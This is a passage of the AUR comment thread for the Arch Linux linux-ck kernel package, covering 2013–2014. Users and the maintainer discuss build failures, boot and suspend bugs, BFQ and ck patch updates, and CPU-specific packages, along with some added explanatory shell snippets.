worked. I would just download the files, and compile without using the damn yaourt? @graysky @Scimmia I'm building using Yaourt. :P I did not know it would cause an error in compiling the kernel that way. 
I've only set up the PKGBUILD, other things too, and then sent compile the kernel. @Schemeidenbacher #-- Specify a directory for package building. #BUILDDIR=/tmp/makepkg Is this? I'm getting an error on the part of the kernel build, and do not know how to solve. The error is this one: patch: **** write error : No space left on device ==> ERROR: A failure occurred in prepare(). Aborting... ==> ERROR: Makepkg was unable to build linux-ck. ==> Restart building linux-ck ? [y/N] Have plenty of space on the partition, then do not know what the logic of this error. Oo graysky commented on 2014-06-11 20:40 Bump to v3.14.7-1 Changelog: Commit: graysky commented on 2014-06-11 20:40 I think it's because repo-ck moves lots of data and they [godaddy] want me to get sick of them and drop my unlimited service they have me in at an old rate. They have offered to upgrade me to a dedicated server for higher reliability several times now for a large increase in my monthly fee. Each time I remind them that my plan is unlimited and that they can upgrade me without a charge. Bastards. I am working slowly with barrikad to setup a mirror on his service. I have been very busy with work/family shit and traveling though. I am booked this weekend as well but hope to do some testing and setup with him shortly. Since some days I get this kind of error while retrieveing packages from repo-ck: error: failed retrieving file 'linux-ck-core2-3.14.6-2-x86_64.pkg.tar.xz' from repo-ck.com : transfer closed with 55761293 bytes remaining to read Am I the only one? OK. I see that 3.14.6-1 is now in svn. I have further adjusted the gcc patch and am building 3.14.6-2 now. I will upload the source tarball to the AUR in several hours once I see that the various new arches using the patch build just fine. For those wanting a tarball early, find it here[1] and please be sure to post to the AUR your experiences building (good or bad) and for which arch! 1. graysky commented on 2014-06-08 00:10 OK... 
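The "No space left on device" failure quoted above is typically makepkg building under /tmp, which on Arch is a RAM-backed tmpfs that kernel sources easily exhaust; the commented BUILDDIR line in /etc/makepkg.conf is what needs changing. A sketch of that edit (the destination path here is illustrative, not prescribed):

```shell
#-- Specify a directory for package building.
#BUILDDIR=/tmp/makepkg
# Point builds at a disk-backed directory instead of tmpfs so large builds
# such as the kernel do not run out of space:
BUILDDIR=/home/build/makepkg   # illustrative path; any disk-backed dir works
```

After this change, rebuilding linux-ck no longer competes with RAM for scratch space.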
I am building with the new patch but will not index the repo until I get some feedback that everything is ok from you guys. So: 1) If you want to build 3.14.6-1-ck yourself, download the source tarball here.1 2) If you want to try a repo-ck package, just browse manually to and navigate to either x86_64 or i686 and manually download the package for your processor. Remember that I am building now and will not have a complete set for another 6 hours or so. 1. graysky commented on 2014-06-07 23:25 Ivy works for me... no access to older stuff that I can mess with at this point in time. graysky commented on 2014-06-07 23:06 I need some savvy users of newer intel cpus (any core ix like nehalem, sandy, ivy, or haswell) to try out the new patch I have placed in my 'unstable' branch. Just substitute the line in this PKGBUILD for it. Please build the package selecting the nconfig option for your hardware, boot into it and let me know that my stuff works. graysky commented on 2014-06-07 21:27 I know that 3.14.6 was just released but I want to wait to make the linux-ck release to see what tpowa does with the official ARCH package as it seems a few new config options are introduced. Please do not flag linux-ck out-of-date until the ARCH 3.14.6-1 is pushed to svn or repo. Thanks! graysky commented on 2014-06-07 19:37 I see now that this is confirmed: I will need to adjust the patch accordingly. graysky commented on 2014-06-07 19:29 Interesting that with the new version of gcc, these "older" options for march and mtune seem to have been made more generic. For example, on my ivy: % gcc -c -Q -march=native --help=target | grep march -march= ivybridge Older gcc version returned -march= core-avx-i @dlh, sure linux-ck-haswell is not compiled with that options and I think that is another story if you are compiling from source, right? Did I understand wrong? 
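The `gcc -march=native` query shown above is also how you work out which repo-ck subarch package fits a machine, since newer gcc reports names like "ivybridge" where older gcc said "core-avx-i". A sketch of that mapping; only package names that actually appear in this thread (core2, ivybridge, haswell, plus the generic linux-ck) are included, and the function name is mine:

```shell
#!/bin/sh
# Map the value gcc reports for -march=native to a repo-ck package name.
# The mapping is a sketch limited to names seen in this thread; extend as needed.
ck_package_for_march() {
    case "$1" in
        core2)                  echo "linux-ck-core2" ;;
        core-avx-i|ivybridge)   echo "linux-ck-ivybridge" ;;  # old/new gcc spelling
        core-avx2|haswell)      echo "linux-ck-haswell" ;;
        *)                      echo "linux-ck" ;;            # generic fallback
    esac
}

# Query the running machine (command form taken from graysky's comment above);
# falls back to the generic package if gcc is unavailable.
native_march=$(gcc -Q -march=native --help=target 2>/dev/null \
               | awk '$1 == "-march=" {print $2}')
ck_package_for_march "$native_march"
```

Per this thread, the heuristic is not infallible: a nominally Haswell Celeron (no AVX/AVX2) booted only with the ivybridge package, so treat the result as a starting point.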
If GCC is wrong with some options when you issue -native, you may have missed some other options too, other than -mno-avx -mno-avx2.: I have G3220 and with native I have -mno-avx -mno-avx2 But you are re saying that linux-ck-haswell is compiled with those options, right? That is why I am unable to run it, correct me if I am wrong? I have an Celeron G1840 CPU. It's an "Haswell" CPU but the Linux-ck-haswell Package doesn't work with CPU. It stops working while loading the initial ramdisk. If i switch to linux-ck-ivybridge, everything works fine. Let me take them in order: clfarron4 - Yes, that patch is needed for building with SMP but this is the first time I can remember it coming up. In the interest of simplicity when I merge this PKGBUILD with the official ARCH PKGBUILD on major version bumps, I want to minimize the potential for errors on my part and thus am rejecting the request to add the SMP patch. CK may roll it into his patchset which is fine, but there aren't many people building this package on a single core system. @janck - I see, you're saying that the modification is needed to keep the build from FAILING in the case of you stripping out the extraneous config options. OK. I will implement your fix and for my sanity comment the PKGBUILD as such so I don't nuke it on an major version merge. @koshak - The sums match for me, not sure why your sums are different. I also don't understand your comment about the gz being txt. Are you editing with something smart like vim? For example, vim will decompress the gz when you open the gz transparently. I hope that addresses everyone's concerns. docwild commented on 2014-05-29 13:20 as clfarron4 mentioned below I suggested a CONFIG_SMP patch on the forum repo topic by mistake. 
That post is now gone but I'll put it here. Adding

[code]
if grep --quiet "# CONFIG_SMP is not set" "${startdir}/config.last" 2>/dev/null || \
   grep --quiet "# CONFIG_SMP is not set" "${startdir}/config.x86_64.last" 2>/dev/null
then
    msg "Applying NOSMP patch"
    patch -Np1 -i "${srcdir}/ck-nosmp.patch"
fi
[/code]

at the very end of the prepare() function, after populating the config.old file, allows users with uniprocessors to disable symmetric multiprocessing support in the kernel config (it has some overhead). The "ck-nosmp.patch" file here: Mentioned on cks blog here:

After removing all dvb shit from the kernel config, include/config/dvb does not exist in the source tree anymore, and consequently the build fails at line 432. This fixes my particular problem (I have been testing that it works this time):

[code]
if [ -d include/config/dvb/ ]; then
    mkdir -p "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/"
    cp include/config/dvb/*.h "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/"
fi
[/code]

- But again, the PKGBUILD as-is should accomplish this:

[code]
mkdir -p "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/"
cp include/config/dvb/*.h "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/"
[/code]

janck commented on 2014-05-28 22:13
Found a fix from a previous build.
[code]
# this line will allow the package to build if a user disables the dvb shit
find include/config/dvb -name '*.h' -exec cp {} "${pkgdir}/usr/src/linux-${_kernver}/include/config/dvb/" \;
[/code]

graysky commented on 2014-05-28 18:55
@janck - Guess I'm confused... your statement says: if include/config/dvb exists, copy include/config/dvb/*.h to "${pkgdir}/usr/lib/modules/${_kernver}/build/include/config/dvb/". The current PKGBUILD does just that, first making the destination on line 432 and doing the same copy on line 433. What am I missing? Shit... did I merge out that line again? I need to review some past PKGBUILDs.
I have a nasty habit of comparing linux-ck to linux the ARCH package to make sure I capture all the new changes. I think I may have merged out our change. I will look into it; faster if you can and point me to it given how busy I am these days. Since i've updatet to 3.14.3-1 i have the same issue, like it's discribed in: Is it possible to compile nls_iso8859-1 into the Kernel like it's been since 3.13? I don't know how to fix this issue without an Kernel with nls_iso8859- builtin support. This section of the package build's comments needs to be updated: "To keep track of which modules are needed for your specific system/hardware, # give module_db script a try: # This PKGBUILD will call it directly to probe all the modules you have logged!" needs to be changed to To keep track of which modules are needed for your specific system/hardware, # give modprobed_db script a try: # This PKGBUILD will call it directly to probe all the modules you have logged! graysky commented on 2014-04-12 22:19. chosig commented on 2014-04-12 19:24 redirects to -- which seems to have wrecked havoc with the subdomains, I guess the move isn't completed yet. Anonymous comment @coderkun, @dlh - In here, 3.13.9-1 from the repo works fine with KVM. I'm using the following: qemu-system-x86_64 -machine type=pc,accel=kvm -cpu host -m 1G -net nic,model=virtio -net user -vga qxl -drive file=*******/XP.qcow2,if=virtio -rtc base=localtime -balloon virtio -spice port=5900,disable-ticketing,image-compression=off,jpeg-wan-compression=never,playback-compression=off -device virtio-serial-pci -device virtserialport,chardev=spicechannel0,name=com.redhat.spice.0 -chardev spicevmc,id=spicechannel0,name=vdagent & coderkun and dlh - adam777 requested that patch in the bbs and replied that all is well with kvm.[1] I asked him to comment here. If the patch is causing breakage for users, I will disable it. I just need to know since I do not use KVM. 1. 
I'm experiencing random hangs of touchpad, mouse and keyboards at boot after kdm start. I'm unable to do anything but a hard reboot. This is what I find in the boot log: mar 24 09:58:53 elric kernel: BUG: unable to handle kernel NULL pointer dereference at (null) mar 24 09:58:53 elric kernel: IP: [<ffffffffa0c9b317>] mousedev_open_device+0x77/0x100 [mousedev] mar 24 09:58:53 elric kernel: PGD b646b067 PUD b6476067 PMD 0 mar 24 09:58:53 elric kernel: Oops: 0000 [#1] PREEMPT SMP mar 24 09:58:53 elric kernel: Modules linked in: mousedev(+) psmouse serio_raw atkbd libps2 uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev media coretemp arc4 microcode(+) iwldvm mac80211 pcspkr i2c_i801 lpc_ich snd_hda_codec_hdmi r592 memstick iwlwi mar 24 09:58:53 elric kernel: CPU: 0 PID: 367 Comm: acpid Tainted: P O 3.13.6-1-ck #1 mar 24 09:58:53 elric kernel: Hardware name: Sony Corporation VGN-SR21M_S/VAIO, BIOS R1110Y1 08/14/2008 mar 24 09:58:53 elric kernel: task: ffff8800b77dda30 ti: ffff8800b64c0000 task.ti: ffff8800b64c0000 mar 24 09:58:53 elric kernel: RIP: 0010:[<ffffffffa0c9b317>] [<ffffffffa0c9b317>] mousedev_open_device+0x77/0x100 [mousedev] mar 24 09:58:53 elric kernel: RSP: 0018:ffff8800b64c1c10 EFLAGS: 00010202 mar 24 09:58:53 elric kernel: RAX: 0000000000000000 RBX: ffff8800b655a000 RCX: ffff8800b655a068 mar 24 09:58:53 elric kernel: RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000246 mar 24 09:58:53 elric kernel: RBP: ffff8800b64c1c28 R08: 0000000000000000 R09: ffff88013b001600 mar 24 09:58:53 elric kernel: R10: 0000000000000000 R11: 0000000000000004 R12: 0000000000000000 mar 24 09:58:53 elric kernel: R13: ffff8800b655a080 R14: ffff8800b65761a8 R15: ffff8801395cf300 mar 24 09:58:53 elric kernel: FS: 00007fae54adb700(0000) GS:ffff88013fc00000(0000) knlGS:0000000000000000 mar 24 09:58:53 elric kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 mar 24 09:58:53 elric kernel: CR2: 0000000000000000 CR3: 00000000b7726000 CR4: 
00000000000007f0 mar 24 09:58:53 elric kernel: Stack: mar 24 09:58:53 elric kernel: ffff880138dda000 ffff8800b655a000 ffff8800b655a078 ffff8800b64c1c60 mar 24 09:58:53 elric kernel: ffffffffa0c9c0cc ffff8800b655a340 ffff8800b65761a8 ffff8801395cf300 mar 24 09:58:53 elric kernel: ffffffffa0c9ce80 ffff8801395cf310 ffff8800b64c1c98 ffffffff8118555f mar 24 09:58:53 elric kernel: Call Trace: mar 24 09:58:53 elric kernel: [<ffffffffa0c9c0cc>] mousedev_open+0xcc/0x150 [mousedev] mar 24 09:58:53 elric kernel: [<ffffffff8118555f>] chrdev_open+0x9f/0x1d0 mar 24 09:58:53 elric kernel: [<ffffffff8117ec97>] do_dentry_open+0x1b7/0x2c0 mar 24 09:58:53 elric kernel: [<ffffffff8118bf41>] ? __inode_permission+0x41/0xb0 mar 24 09:58:53 elric kernel: [<ffffffff811854c0>] ? cdev_put+0x30/0x30 mar 24 09:58:53 elric kernel: [<ffffffff8117f0b1>] finish_open+0x31/0x40 mar 24 09:58:53 elric kernel: [<ffffffff8118ed72>] do_last+0x572/0xe90 mar 24 09:58:53 elric kernel: [<ffffffff8118c236>] ? link_path_walk+0x236/0x8d0 mar 24 09:58:53 elric kernel: [<ffffffff8118f74b>] path_openat+0xbb/0x6b0 mar 24 09:58:53 elric kernel: [<ffffffff81190e5a>] do_filp_open+0x3a/0x90 mar 24 09:58:53 elric kernel: [<ffffffff8119d527>] ? 
__alloc_fd+0xa7/0x130 mar 24 09:58:53 elric kernel: [<ffffffff81180284>] do_sys_open+0x124/0x220 mar 24 09:58:53 elric kernel: [<ffffffff8118039e>] SyS_open+0x1e/0x20 mar 24 09:58:53 elric kernel: [<ffffffff814fd16d>] system_call_fastpath+0x1a/0x1f mar 24 09:58:53 elric kernel: Code: f0 8b 85 e0 5b 44 89 e0 41 5c 41 5d 5d c3 66 0f 1f 44 00 00 4c 89 ef 41 bc ed ff ff ff e8 d2 8b 85 e0 eb e0 48 8b 15 c9 21 00 00 <8b> 02 8d 48 01 85 c0 89 0a 75 c6 48 8b 05 37 1f 00 00 48 8d 98 mar 24 09:58:53 elric kernel: RIP [<ffffffffa0c9b317>] mousedev_open_device+0x77/0x100 [mousedev] mar 24 09:58:53 elric kernel: RSP <ffff8800b64c1c10> mar 24 09:58:53 elric kernel: CR2: 0000000000000000 mar 24 09:58:53 elric kernel: ---[ end trace fffdd7fde71f92ba ]--- I'm not really sure the culprit is the kernel, but I don't have time now to test with a stock kernel. So I'd like to know if any other user of linux-ck experiences this (I'm using linux-ck-core2) graysky commented on 2014-03-22 13:31 Bump to v3.13.6-2 Changelog: Fix mass storage problems. Commit: Since 3.13.7 is due out within the next 24 h.[1] According to the 3.13.7-rc1 patchset, both of these patches are included therein. I will bump 3.13.6 to -2 and include them both, but I don't want to rebuild all the repo packages since I will likely be doing it again when upstteam releases shortly. 1. graysky commented on 2014-03-22 12:57 Bump to v3.13.6-2 Changelog: Fix mass storage problems. Commit: graysky commented on 2014-03-22 12:55 @sir_lucjan - 3.13.7 is due out within the next 24 h.[1] According to the 3.16.7-rc1 patchset, both of these patches are included therein. I will bump 3.13.6 to -2 and include them both, but I don't want to rebuild all the repo packages since I will likely be doing so again tomorrow morning when 3.13.7 goes gold. 1. sir_lucjan commented on 2014-03-22 11:08 I tried the default kernel config instead of my tailored one and it worked with the current ck kernel and systemd. 
I still don't know where the problem is (I did not modify the config in months), but I've come to the conclusion that it must be my (or better my config's) fault. Schmeidenbacher commented on 2014-03-06 09:31 Now that you mention it, i run my system from an encrypted lvm configuration. My mkinitcpio.conf has the following MODULES and HOOKS configurations: MODULES="dm_mod ext2 ext4" HOOKS="base udev v86d autodetect modconf block keyboard keymap lvm2 encrypt filesystems shutdown fsck" Note, that my system is not configured in english, so i had to add keymap and keyboard early on to get my encryption password entered correctly. xcomcmdr commented on 2014-03-06 06:31 I've tried every way to build linux-ck (without any modification but the ck, with the stock configuration, only with probed modules, ...). Still the same problem : Kernel panic - not syncing : VFS: Unable to mount root fs on unknown-block(0,0) Google suggests to include the ext4 module in the initrd image... Interesting. Since last night, while using the stock kernel and copying 35 GB of MP3s from /dev/sda2 (ext4) to /dev/sda1 (ntfs3g) firefox and audacious hanged a few times, which means that simple multitasking doesn't work (!), I wanted to try linux-ck's BFQ I/O scheduler once again... Schmeidenbacher commented on 2014-03-05 22:26 Mine works fine. The only issue i encountered with systemd 210-2 was the sudden urge of my quad-core desktop computer to start systemd-backlight@eeepc-wmi.service for some insane reason – scaring me with a nice red "FAILED" during boot – and systemd-logind.service to complain that it can't apply ACLs. Neither managed to hinder boot otherwise. My kernel is custom build using mostly the modules and drivers i need on my system. The kernel config can be found here: xcomcmdr commented on 2014-03-05 22:10 same issue here, since ages ago. Linux-ck can't mount / and panics. 
corro commented on 2014-03-04 22:52 It looks like I've encountered some troubles during boot with the 3.13.5 kernel and systemd 210-2. It only happens with the ck kernel, neither default ARCH nor AUR mainline kernel seem to be affected. The boot process always times out when mounting the local file systems and drops to the rescue shell. After a downgrade to systemd 208-11, the current ck kernel works fine again. You can find the boot log here:. Am I overlooking something or is there anyone experiencing the same problem? graysky commented on 2014-03-04 20:39 Updated nvidia-ck and fixed the postinstall scriptlet in virtualbox-ck-foo-modules. Thanks for reporting. kyak commented on 2014-03-04 14:12 hi graysky, it seems that virtualbox-ck-host-modules-ivybridge contains something after EOF in post_upgrade script... (18/21) обновление virtualbox-ck-host-modules-ivybridge [#####################################] 100% /tmp/alpm_gxCJK2/.INSTALL: line 23: warning: here-document at line 7 delimited by end-of-file (wanted `EOF') /tmp/alpm_gxCJK2/.INSTALL: line 24: ошибка синтаксиса: неожиданный конец файла /usr/bin/bash: post_upgrade: команда не найдена:30 @shillshocked, Fixed, thanks. modprobed-db still works if you call it via modprobed_db due to a symlink I put in its Makefile: # symlink for compatibility due to name change ln -s $(PN) "$(DESTDIR)$(BINDIR)/modprobed_db" You may have to turn off power management with the latest kernel under some configurations. I did (not using this kernel, but a plain vanilla one) under 3.13.5-1-ARCH. In my case all I had to do was add radeon.runpm=0 to the kernel boot options. No problem. I really wish the 'flag out-of-date' button required a reason to be entered like the one on the official packages to help maintainers understand why. For example, this package could be dated for several reasons: *kernel code *ck1 code *BFQ code Can't download anything form algo.ing.unimo.it. 
First I was getting timeouts, then the IP address changed several times in a few minutes (I did "follow" it with several nslookups), and after it stabilized I got a "network unreachable" error. Several "is it down" sites on the net also report it as down.

I see the problem... a mistake on my part when I fixed a previous mistake regarding the tick rate a few versions ago. I have fixed it now but have not bumped the pkgver since this is the only change (i.e. no BFQ in manually built packages of 3.12.6-1-ck). Repo-ck users have the scheduler due to the build script being smarter than its author :p

paulfurtado commented on 2014-01-05 14:39
Thanks for the responses, graysky and coderkun.
$ uname -a
Linux paul-desktop 3.12.6-1-ck #1 SMP PREEMPT Sat Jan 4 17:40:03 EST 2014 x86_64 GNU/Linux
$ cat /sys/block/sda/queue/scheduler
noop deadline [cfq]

Odd, on my test boxes the old versions worked just fine. In any case, the PKGBUILDs have been updated and the repo packages are syncing now. Refresh in 10 min or so to pull down the new package, then:
# rmmod nvidia
# modprobe nvidia
Then restart your X server and all should be well... or if you're lazy, just update and reboot.

csmk commented on 2013-10-14 16:11
@graysky: after upgrading to 3.11.5-1 my nvidia module has become unusable.
nvidia: disagrees about version of symbol module_layout
modprobe: ERROR: could not insert 'nvidia': Exec format error
I'm using nvidia-ck-k10 from repo-ck. Please, can you help me?

graysky commented on 2013-10-01 20:04
This might have something to do with the alx driver, which recently went upstream.

After applying the rmmod/modprobe fix as described here: (I actually used the alx.sh fix from), hibernation seems to work. "Seems" because I only tried a couple of times; let's see if it fails during the next few days.

Anonymous comment on 2013-09-17 00:22
@kyak hibernate to RAM has been buggy for -ck AUR since 3.10; I have stopped using -ck for some critical text editing.
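As in paulfurtado's output above, the active I/O scheduler is the bracketed entry in /sys/block/<dev>/queue/scheduler. A small helper — the function name is mine, not from any package — to pull it out, so you can quickly confirm whether BFQ is actually in use:

```shell
# Extract the bracketed (active) scheduler from a scheduler file.
# active_sched is a hypothetical helper, shown here on sample input; on a
# real system pass /sys/block/sda/queue/scheduler instead.
active_sched() {
  sed -n 's/.*\[\(.*\)\].*/\1/p' "$1"
}
active_sched <(echo "noop deadline [cfq]")   # -> cfq
```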
However, could someone tell me how to record the bug? The system freezes when hibernating and only a hard reset helps. My box is an X230, i7 with HD3000 GPU.

kyak commented on 2013-09-16 19:37
Hi graysky, thanks for pushing this change (it doesn't do any harm anyway). Unfortunately, it doesn't fix the problem for me. The first time, it hibernates fine; the second time my laptop freezes hard :-( Won't try any more so as not to wreck my laptop.

----

Bump to v3.11.1-2
Changelog: Added an option in the PKGBUILD to set the default tick rate from 300 to 1000 per reports (2 people now) on CK's blog that this fixes the suspend/resume issues people have been reporting.[1] Also cleaned up the comments in the PKGBUILD.
Commit:
1.

graysky commented on 2013-09-16 09:13
@dlh - I am building packages now for the repo that will have 1k ticks enabled just like the default PKGBUILD recommends. If indeed this solves the suspend issues people are having, I think upstream needs to do this in the ck1 patchset itself... either that or figure out why some machines hang when suspending/waking up with the patchset.

BFQ is ready for the 3.11 series.

For those of you [misc] who like to see or build/run the pre-release of the next linux-ck as we wait for CK to patch into the new tree, I am hosting the incomplete (no ck1) stuff here:
Note that all the PKGBUILDs/files for the xxx-ck stuff are in the tar file:
% tar tf ck-next-1.0.tar.xz | grep PKGBUILD
./lirc-ck/PKGBUILD
./virtualbox-ck-modules/PKGBUILD
./broadcom-wl-ck/PKGBUILD
./nvidia-ck/PKGBUILD
./nvidia-304xx-ck/PKGBUILD
./linux-ck/PKGBUILD

You can help by keeping an eye out for the ck1 patchset.
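The 300 -> 1000 tick-rate change described in the changelog above can be double-checked after the fact. On a running kernel with CONFIG_IKCONFIG_PROC enabled you could run `zgrep '^CONFIG_HZ' /proc/config.gz`; against a saved config file the check is a plain grep. The sample file below stands in for the real config:

```shell
# Check which tick rate a kernel config selects. The sample lines stand in
# for a real config file (or for zcat /proc/config.gz output).
cfg=$(mktemp)
printf 'CONFIG_HZ_1000=y\nCONFIG_HZ=1000\n' > "$cfg"
grep '^CONFIG_HZ=' "$cfg"   # -> CONFIG_HZ=1000
```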
It usually takes CK 1-2 weeks to get a patchset together for a major version bump. 3.11-1-ARCH has been published, so configs and patches, etc. aren't an issue. The only other must-have is a BFQ patchset for the 3.11 tree. Paolo et al. usually do a pretty good job timewise. Another wildcard is the speed at which devs patch needed modules to build with 3.11 — nvidia and virtualbox, for example.

runnytu commented on 2013-09-03 09:41
@graysky I flagged the package before reading your post, sorry for the inconvenience; I didn't know what the procedure is when a major kernel release lands, sorry for that. I'll wait until the upstream code and all the patches for ck and bfs are released.

graysky commented on 2013-09-03 09:00
@runnytu - did you read my last post??? Why are you flagging this package when the upstream code doesn't yet exist?

graysky commented on 2013-09-02 21:50
Guys - I realize that 3.11.0 was just mainlined, but we don't yet have several of the prereqs to make a proper linux-ck release[1]:
*ck1
*bfq
Please flag it again once we have them in case I miss it.
1.

Anonymous comment on 2013-08-30 08:28
:( @graysky nope, my problem is not like [1]. It does not report anything and the screen goes blank after I select the arch-ck boot entry. I am using UEFI boot mode with CSM disabled. My box is a Lenovo X230 with an Intel HD4000 GPU. 3.10.9-1 can boot OK but I suffer from random freezes/lockups, so I think upgrading to 3.10.10-1 might solve the problem.

graysky commented on 2013-08-30 07:42
@liubenyuan - Is it the same problem described here[1]? Are you booting with BFQ enabled? What if you disable it? Paolo will need to know if his new patch does not fix the problem.
1.
Anonymous comment on 2013-08-30 07:38
@graysky anyway, I failed to boot 3.10.10-1 and I am waiting for your magic update like 3.10.8 -> 3.10.9 :) And one problem I need to report is that once I upgraded to 3.10.9, the system suffered random lockups and a hard reset had to be done.

graysky commented on 2013-08-30 07:14
@liubenyuan - Not according to Paolo:
On 08/28/2013 03:33 AM, Paolo Valente wrote:
> I'm not sure I fully understood your question, anyway:
> to add BFQ-v6r2 to a 3.10.8+ kernel from scratch, the patchset [1] is all you need
>
> I hope this addresses your issue,
> Paolo
>
> Il giorno 27/ago/2013, alle ore 21:04, member graysky ha scritto:
>
>> Hi Paolo. I see you posted some new BFQ code[1]. Tell me, are these considered "stable?" Also, I noticed that I can still patch the included one from that google group link on top of these 3 you posted. Doesn't that mean that your patches are different from the one there? Should I still patch your 3 plus the one by Arianna Avanzini[2]?
>>
>> 1.
>> 2.

I will look into that BFQ patch when I release 3.10.9-1 later this afternoon; my understanding from reading anecdotal reports is that indeed BFQ and 3.10.8 do not play well together. PS sorry about the multiple posts. Posting from a phone sucks.

I've had hard lockups at boot-time with linux-ck and the vanilla kernel for a long time. It's rare and random, however. :/

3.10.8-1-ck gives me the same error as BorgHunter. I reverted to 3.10.7-1-ck and it works fine. I do not have "elevator=something" on my kernel boot line.

3.10.8 definitely causes problems for me. Hard lockup at boot with the message "Fixing recursive fault but reboot is needed" or something like that (can't find any logs for it). Looks like, according to the changelog, 3.10.9 might solve this. I'm on the vanilla kernel (3.10.7) until ck is updated.

I'm getting a seg. fault when compiling linux-ck 3.10.7-2; all other 3.10 versions (and I compiled each of them) have worked and compiled properly. How and where do I file a bug report about this? This is a paste of the compile error. Anyone have any hints about what may cause the problem, or maybe someone has had a similar issue?

@jonhoo - I don't believe this is a limitation of the linux-ck package but of how makepkg works. I am not an expert; I recommend that you open a thread asking how to compile a kernel the way you want to, so someone with real knowledge about it can comment.

dlh commented on 2013-08-13 12:23
Well, in Gentoo Linux, first of all you download the whole source of the proper series, for instance 3.10, and then a set of patches. The update-management scripts will then unpack 3.10 and apply all patches starting from 3.10.1 up to the one demanded, in this case 3.10.6, so 6 patches are applied during this process.

qpalz commented on 2013-08-13 12:18
@Jonhoo Kernel patches are not incremental. The patch for 3.10.6 is for 3.10.0 -> 3.10.6, but NOT for 3.10.5 -> 3.10.6. You cannot update the src from 3.10.5 to 3.10.6 by simply applying the patch for 3.10.6. Also, as far as I know, you should always recompile everything even if you have only changed some configuration. There are some bugs in the Makefile. (Not sure whether this is still true.)

Jonhoo commented on 2013-08-13 10:43
@graysky: As I wrote, removing src/ is what I'm currently doing, but this means make has to recompile every single file, which is a bit of a waste. The kernel patches are incremental, so applying them on top of an existing source tree should upgrade that source tree without needing to run make from scratch. I don't know why this isn't working with linux-ck though... Quite often when a new patch level is released and I run makepkg, I see:
The next patch would create the file ..., which already exists! Assume -R? [n]
This is rather annoying, as the only solution I've found thus far is to rm -r src/.
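qpalz's point above — that kernel.org point-release patches apply against the base tree, not against the previous point release — can be demonstrated end-to-end with throwaway files. Everything below is illustrative (the file names mimic patch-3.10.5/patch-3.10.6); on a real tree the same revert-then-apply dance is what would let you avoid the `rm -r src/` workaround:

```shell
# Tiny self-contained demo: both "point release" patches are generated
# against the same base tree, so updating an already-patched tree means
# reverting the old patch (-R) before applying the new one.
tmp=$(mktemp -d)
cd "$tmp"
mkdir base v5 v6
echo "VERSION = 3.10.0" > base/Makefile
echo "VERSION = 3.10.5" > v5/Makefile
echo "VERSION = 3.10.6" > v6/Makefile
diff -u base/Makefile v5/Makefile > patch-3.10.5 || true
diff -u base/Makefile v6/Makefile > patch-3.10.6 || true
mkdir linux && cp base/Makefile linux/
cd linux
patch -p1 < ../patch-3.10.5      # base -> 3.10.5
patch -R -p1 < ../patch-3.10.5   # revert back to base
patch -p1 < ../patch-3.10.6      # base -> 3.10.6
cat Makefile                     # -> VERSION = 3.10.6
```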
Not entirely sure why this is happening. This time the file in question was "drivers/acpi/acpi_cmos_rtc.c", but I'm fairly certain other files have been the problem before.

graysky commented on 2013-08-11 11:01
@Det - Ah, thanks. It technically is, but the difference there is purely cosmetic[1] and will be included in 3.10.6-1 whenever Greg releases that. It seems too that tpowa has been tweaking the Arch configs and added a patch[2], which I have incorporated into linux-ck; again, these will be included in 3.10.6-1. When you guys hit the flag button, I always have to review the various patchsets (ck, BFQ, upstream, etc.) to figure out why it's out-of-date :p
1.
2.

graysky commented on 2013-08-06 19:32
@kyak - This can happen when the Arch devs push a major version update of nvidia-utils to the official servers and I am away from my workstation or unable to update the nvidia-ck package to match. It is rare, often only for a few hours, and the version conflict will prevent any breakage. I just updated the nvidia-ck package to 325.15 and populated the repo with it as well. If you refresh and update you should be good now. In the future, simply flagging the nvidia-ck package out-of-date will alert me to the Arch update. This is true for nvidia-304xx-ck, lirc-ck, and virtualbox-ck-modules too.

Same here, my laptop (Asus N76VZ) only hibernates on maybe 25% of attempts. The problem is not reproducible, so I can't really report it. The fact is, starting some time in the 3.10 series and up to the latest 3.10.3, I can't rely on hibernation to work.

Anonymous comment on 2013-07-25 22:11
Reported.
I have been using linux-ck-3.10.1 and linux-ck-3.10.2 for two weeks; however, the -ck patchset suffers from suspend issues on my ThinkPad X230 box. There is about a 25% chance that when you press Fn+F4 (suspend-to-RAM) the system locks up (maybe a kernel panic) and the power/sleep LED keeps flashing fast; you have to hold the power button to shut it down.
#1. Commenting out line 110 of the linux-ck 3.10.2 PKGBUILD does not resolve this problem; suspend-to-RAM still does not function properly.
#2. I switched to the linux-3.10.2 ARCH kernel yesterday and suspend-to-RAM has functioned well so far, 11/11 successes.
I do not know whether it is a 3.10 mainline bug or related to the BFS/ck patchset. I installed 3.11-rc2 today and will keep reporting the results if that is useful. And how could I save the kernel log when the system hangs? I found no evidence of the failure in the journalctl or dmesg logs.

graysky commented on 2013-07-25 19:12
Guys - I have seen a half dozen patches claiming to fix suspend issues. As stated before, I am not adding experimental patches to the PKGBUILD that are enabled. You guys should be savvy enough to just add a patch line to the PKGBUILD to include your favorite ones beyond what I am including. Please do so. I am happy to add a patch to the kernel once it has been accepted by upstream, particularly if it fixes a problem people are having. For the most part, I do not want to be the enabling force by adding commented lines to apply patches. Please post if you have applied a patch yourself and tested it in a robust fashion. In other words, run it for a few days; if it fixes a particular issue, pound on your system trying to reproduce the bug a number of times, etc. Above all else, please open a flyspray against the Arch kernel package if you know the issue is contained in mainline, since we're all in the same boat, ck patchset or not. /off my soapbox

jim1960 commented on 2013-07-25 13:01
I'm using linux-mainline v3.11rc2 and nvidia-beta v325.08; they just work fine.
It fixed the suspend/resume issue with linux v3.10.x (linux-ARCH & linux-ck). For the patch for linux-mainline v3.11rc2, follow post #4 (kernel_v3.10.patch.txt):
CPU: AMD Athlon(tm) II X4 651 Quad-Core Processor (651K)
GPU: nVidia GTS 450

dlh commented on 2013-07-25 09:17
I can say that in the 3.10 kernel suspend often works, and so in 3.9.x, but sometimes I am left with a blinking cursor; 3.10.x is completely broken. I rolled back to 3.9.9 from the official repo for now and am monitoring the current state.

graysky commented on 2013-07-24 22:45
